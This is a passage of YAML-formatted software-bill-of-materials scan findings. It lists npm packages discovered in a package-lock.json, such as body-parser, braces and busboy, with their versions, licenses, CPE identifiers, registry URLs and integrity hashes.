startLine: 0 + message: 'Package discovered: bidi-js 1.0.3' + title: bidi-js 1.0.3 + description: 'Package discovered: bidi-js 1.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 983a70fcd42b01da + name: bidi-js + version: 1.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:bidi-js:bidi-js:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:bidi-js:bidi_js:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:bidi_js:bidi-js:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:bidi_js:bidi_js:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:bidi:bidi-js:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:bidi:bidi_js:1.0.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/bidi-js@1.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/bidi-js/-/bidi-js-1.0.3.tgz + integrity: sha512-RKshQI1R3YQ+n9YJz2QQ147P66ELpa1FQEg20Dk8oW9t2KgLbpDLLp9aGZ7y8WHSshDknG0bknqGw5/tyCs5tw== + dependencies: + require-from-string: ^2.0.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2fa656db5288bebd + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: bignumber.js 9.3.1' + title: bignumber.js 9.3.1 + description: 'Package discovered: bignumber.js 9.3.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0debd0f90c403668 + name: bignumber.js + version: 9.3.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:bignumber.js:bignumber.js:9.3.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/bignumber.js@9.3.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/bignumber.js/-/bignumber.js-9.3.1.tgz + integrity: sha512-Ko0uX15oIUS7wJ3Rb30Fs6SkVbLmPBAKdlm7q9+ak9bbIeFf0MwuBsQV6z7+X768/cHsfg+WlysDWJcmthjsjQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7dd5ae9dd664c020 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: binary-extensions 2.3.0' + title: binary-extensions 2.3.0 + description: 'Package discovered: binary-extensions 2.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a472eb11fead94f4 + name: binary-extensions + version: 2.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:binary-extensions:binary-extensions:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:binary-extensions:binary_extensions:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:binary_extensions:binary-extensions:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:binary_extensions:binary_extensions:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:binary:binary-extensions:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:binary:binary_extensions:2.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/binary-extensions@2.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/binary-extensions/-/binary-extensions-2.3.0.tgz + integrity: sha512-Ceh+7ox5qe7LJuLHoY0feh3pHuUDHAcRUeyL2VYghZwfpkNIy/+8Ocg0a3UuSoYzavmylwuLWQOf3hl0jjMMIw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d29a5e4fb92420c3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: body-parser 1.20.5' + title: body-parser 1.20.5 + description: 'Package discovered: body-parser 1.20.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 04b33f5cfaf593a5 + name: body-parser + version: 1.20.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:openjsf:body-parser:1.20.5:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/body-parser@1.20.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/body-parser/-/body-parser-1.20.5.tgz + integrity: sha512-3grm+/2tUOvu2cjJkvsIxrv/wVpfXQW4PsQHYm7yk4vfpu7Ekl6nEsYBoJUL6qDwZUx8wUhQ8tR2qz+ad9c9OA== + dependencies: + bytes: ~3.1.2 + content-type: ~1.0.5 + debug: 2.6.9 + depd: 2.0.0 + destroy: ~1.2.0 + http-errors: ~2.0.1 + iconv-lite: ~0.4.24 + on-finished: ~2.4.1 + qs: ~6.15.1 + raw-body: ~2.5.3 + type-is: ~1.6.18 + unpipe: ~1.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8d245dad35d0de48 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: brace-expansion 2.1.0' + title: brace-expansion 2.1.0 + description: 'Package discovered: brace-expansion 2.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 833f3564230327b0 + name: brace-expansion + version: 2.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:brace-expansion:brace-expansion:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:brace-expansion:brace_expansion:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:brace_expansion:brace-expansion:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:brace_expansion:brace_expansion:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:brace:brace-expansion:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:brace:brace_expansion:2.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/brace-expansion@2.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.1.0.tgz + integrity: sha512-TN1kCZAgdgweJhWWpgKYrQaMNHcDULHkWwQIspdtjV4Y5aurRdZpjAqn6yX3FPqTA9ngHCc4hJxMAMgGfve85w== + dependencies: + balanced-match: ^1.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2c758a1366af3ce7 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: braces 3.0.3' + title: braces 3.0.3 + description: 'Package discovered: braces 3.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e8863a3d87ad712b + name: braces + version: 3.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:braces_project:braces:3.0.3:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + - cpe: cpe:2.3:a:jonschlinkert:braces:3.0.3:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/braces@3.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/braces/-/braces-3.0.3.tgz + integrity: sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA== + dependencies: + fill-range: ^7.1.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4acea70fbe4d3073 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: brotli 1.3.3' + title: brotli 1.3.3 + description: 'Package discovered: brotli 1.3.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6bc686959e36e164 + name: brotli + version: 1.3.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:brotli:brotli:1.3.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/brotli@1.3.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/brotli/-/brotli-1.3.3.tgz + integrity: sha512-oTKjJdShmDuGW94SyyaoQvAjf30dZaHnjJ8uAF+u2/vGJkJbJPJAT1gDiOJP5v1Zb6f9KEyW/1HpuaWIXtGHPg== + dependencies: + base64-js: ^1.1.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 08e716a2d2fe7179 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: browserify-zlib 0.2.0' + title: browserify-zlib 0.2.0 + description: 'Package discovered: browserify-zlib 0.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: adb6ab9adab6e7b8 + name: browserify-zlib + version: 0.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:browserify-zlib:browserify-zlib:0.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:browserify-zlib:browserify_zlib:0.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:browserify_zlib:browserify-zlib:0.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:browserify_zlib:browserify_zlib:0.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:browserify:browserify-zlib:0.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:browserify:browserify_zlib:0.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/browserify-zlib@0.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/browserify-zlib/-/browserify-zlib-0.2.0.tgz + integrity: sha512-Z942RysHXmJrhqk88FmKBVq/v5tqmSkDz7p54G/MGyjMnCFFnC79XWNbg+Vta8W6Wb2qtSZTSxIGkJrRpCFEiA== + dependencies: + pako: ~1.0.5 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 27d8113ce8ad07e6 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: browserslist 4.28.2' + title: browserslist 4.28.2 + description: 'Package discovered: browserslist 4.28.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 4688a05ee871df84 + name: browserslist + version: 4.28.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:browserslist_project:browserslist:4.28.2:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/browserslist@4.28.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/browserslist/-/browserslist-4.28.2.tgz + integrity: sha512-48xSriZYYg+8qXna9kwqjIVzuQxi+KYWp2+5nCYnYKPTr0LvD89Jqk2Or5ogxz0NUMfIjhh2lIUX/LyX9B4oIg== + dependencies: + baseline-browser-mapping: ^2.10.12 + caniuse-lite: ^1.0.30001782 + electron-to-chromium: ^1.5.328 + node-releases: ^2.0.36 + update-browserslist-db: ^1.2.3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4b1e259ceb7e99ec + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: buffer-equal-constant-time 1.0.1' + title: buffer-equal-constant-time 1.0.1 + description: 'Package discovered: buffer-equal-constant-time 1.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ea42e35a908d5ccd + name: buffer-equal-constant-time + version: 1.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:buffer-equal-constant-time:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer-equal-constant-time:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer_equal_constant_time:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer_equal_constant_time:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer-equal-constant:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer-equal-constant:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer_equal_constant:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer_equal_constant:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer-equal:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer-equal:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer_equal:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer_equal:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/buffer-equal-constant-time@1.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/buffer-equal-constant-time/-/buffer-equal-constant-time-1.0.1.tgz + integrity: sha512-zRpUiDwd/xk6ADqPMATG8vc9VPrkck7T07OIx0gnjmJAnHnTVXNQG3vfvWNuiZIkwu9KrKdA1iJKfsfTVxE6NA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 991f80bfd3038fd0 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: buffer-from 1.1.2' + title: buffer-from 1.1.2 + description: 'Package discovered: buffer-from 1.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 98e22d90241a7628 + name: buffer-from + version: 1.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:buffer-from:buffer-from:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer-from:buffer_from:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer_from:buffer-from:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer_from:buffer_from:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer:buffer-from:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:buffer:buffer_from:1.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/buffer-from@1.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz + integrity: sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e092abe833e5a95d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: busboy 1.6.0' + title: busboy 1.6.0 + description: 'Package discovered: busboy 1.6.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3009b8237fb85cf0 + name: busboy + version: 1.6.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:busboy:busboy:1.6.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/busboy@1.6.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/busboy/-/busboy-1.6.0.tgz + integrity: sha512-8SFQbg/0hQ9xy3UNTB0YEnsNBbWfhf7RtnzpL7TkBiTBRfrQ9Fxcnz7VJsleJpyp6rVLvXiuORqjlHi5q+PYuA== + dependencies: + streamsearch: ^1.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 81eb78c52edce0ec + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: bytes 3.1.2' + title: bytes 3.1.2 + description: 'Package discovered: bytes 3.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f9a24c0655f5cc44 + name: bytes + version: 3.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:bytes:bytes:3.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/bytes@3.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/bytes/-/bytes-3.1.2.tgz + integrity: sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a35927eb13a2081e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: call-bind-apply-helpers 1.0.2' + title: call-bind-apply-helpers 1.0.2 + description: 'Package discovered: call-bind-apply-helpers 1.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2303cf02934afa6a + name: call-bind-apply-helpers + version: 1.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:call-bind-apply-helpers:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:call-bind-apply-helpers:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:call_bind_apply_helpers:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:call_bind_apply_helpers:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:call-bind-apply:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:call-bind-apply:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:call_bind_apply:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:call_bind_apply:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:call-bind:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:call-bind:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:call_bind:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:call_bind:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:call:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:call:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/call-bind-apply-helpers@1.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz + integrity: sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ== + dependencies: + es-errors: ^1.3.0 + function-bind: ^1.1.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4e5277c95313e881 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: call-bound 1.0.4' + title: call-bound 1.0.4 + description: 'Package discovered: call-bound 1.0.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 23c8e695a4ffce79 + name: call-bound + version: 1.0.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:call-bound:call-bound:1.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:call-bound:call_bound:1.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: 